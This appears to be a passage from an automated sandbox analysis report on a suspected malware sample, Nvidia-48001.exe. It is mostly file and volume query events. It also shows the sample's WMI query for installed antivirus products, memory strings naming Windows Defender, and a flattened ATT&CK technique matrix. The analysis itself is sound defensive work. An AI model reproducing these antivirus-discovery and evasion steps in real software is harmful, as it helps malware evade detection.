Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetSecurity\Microsoft.Windows.Firewall.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeQueries volume information: C:\ VolumeInformation
Source: Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: es%\Windows Defender\MsMpeng.exe
Source: Nvidia-48001.exe, 0000000A.00000003.2834676511.0000000001C45000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Nvidia-48001\Nvidia-48001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
1
Credential API Hooking
1
File and Directory Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
BITS Jobs
11
Process Injection
1
Deobfuscate/Decode Files or Information
LSASS Memory121
System Information Discovery
Remote Desktop Protocol1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts4
PowerShell
2
Registry Run Keys / Startup Folder
2
Registry Run Keys / Startup Folder
1
Obfuscated Files or Information
Security Account Manager231
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
Software Packing
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets41
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
Virtualization/Sandbox Evasion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
BITS Jobs
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Services File Permissions Weakness
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
